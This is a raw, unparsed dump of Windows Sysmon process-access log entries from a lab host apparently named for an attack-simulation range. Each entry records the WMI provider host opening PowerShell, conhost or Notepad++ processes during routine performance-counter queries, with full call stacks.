21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E003-00000000D101}5836c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151942Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DF03-00000000D101}5496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151941Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DF03-00000000D101}5496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151940Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DE03-00000000D101}1224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151939Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DE03-00000000D101}1224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151938Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151937Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151936Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151935Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151934Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151933Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151932Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1555-60CA-6A01-00000000D101}4856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151931Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1555-60CA-6A01-00000000D101}4856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151930Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6801-00000000D101}1724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151929Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6801-00000000D101}1724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151928Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6701-00000000D101}1880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151927Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 